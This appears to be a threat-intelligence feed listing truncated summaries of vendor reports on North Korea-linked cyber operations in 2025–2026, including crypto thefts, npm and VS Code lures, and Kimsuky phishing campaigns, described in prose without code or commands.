387 reports
North Korean-linked operators were tied to two major April 2026 DeFi thefts and a software supply-chain compromise. Drift Protocol lost about $280 million after attackers spent months posing as a legitimate trading firm, obtained pre-signed multisig appro…
Lazarus-linked operators are using a three-stage malware framework, DPAPILoader, RemotePELoader, and RemotePE, to maintain stealthy long-term access in financial and cryptocurrency environments. DPAPILoader decrypts victim-bound payloads with Windows DPAP…
The episode shows how campaign infrastructure can be misclassified when analysts focus on a single observed role. A server first understood as an FTP exfiltration host was later tied to additional campaign-linked services. The source specifically connects…
Sapphire Sleet, also tracked as BlueNoroff and UNC1069, is targeting macOS users in venture capital, Web3, and cryptocurrency organizations through social engineering that delivers a fake Zoom SDK update. The infection chain uses Script Editor, `osascript…
A malicious npm package, js-logger-pack, evolved from a probe into a dropper for MicrosoftSystem64, a cross-platform Node.js Single Executable Application that functions as an infostealer and RAT. The payload targets browser credentials, more than 80 cryp…
ESET observed multiple North Korea-aligned groups targeting developers, cryptocurrency interests, strategic industries, and ethnic Korean communities from October 2025 through March 2026. Andariel deployed TigerRAT and attempted Rook ransomware against a …
Wiz identified JINX-0164, a previously unreported financially motivated actor targeting cryptocurrency organizations and developers through LinkedIn recruitment/business lures, fake conferencing pages, and malicious macOS “fix” scripts. The actor deploys …
ENKI Whitehat identified Kimsuky malware delivery activity through April 2026 against South Korean military and enterprise-related targets. The campaigns used tailored lures, including fake domestic security software installation pages and a fake Webex me…
ENKI Whitehat reported Kimsuky malware delivery cases targeting South Korean military and corporate environments through April 2026. The actor used fake security software installation pages and a Webex-themed lure based on a legitimate meeting schedule, w…
AhnLab observed malicious LNK files distributed as secure email from a well-known Korean card company, with a flow similar to earlier Kimsuky password-file lure activity but with changed initial commands. The LNK launches PowerShell and `mshta` to run an …
Proofpoint observed DPRK-aligned TA406, also known as Opal Sleet, chaining CVE-2026-21509 and CVE-2026-21510 in March and April 2026 email campaigns. The campaigns used visa-processing and diplomatic-initiative lures with RTF attachments that triggered Mi…
Hauri identified a new KimjongRAT variant related to malware previously disguised as a tax notice. The variant preserves earlier information-stealing behavior but expands collection to Telegram and Discord data, indicating broader targeting of user commun…
NK Internet observed 175.45.176.97 in the DPRK IP range returning a 302 redirect to recoshield.com between May 14 and May 17, 2026, with headers showing Apache on Rocky Linux and PHP. Further probing exposed a captive portal-style framework that checked G…
AhnLab observed April 2026 APT activity against South Korean targets, with most infections beginning through spear-phishing emails that used spoofed senders, malicious attachments, and malicious links. The activity relied heavily on LNK files, PowerShell,…
A fake Pulsynk recruiting email targeted a smart-contract security developer with instructions to clone a GitLab repository and open it in VS Code or Cursor. The repository abused a `.vscode/tasks.json` folder-open task to install a malicious VS Code exte…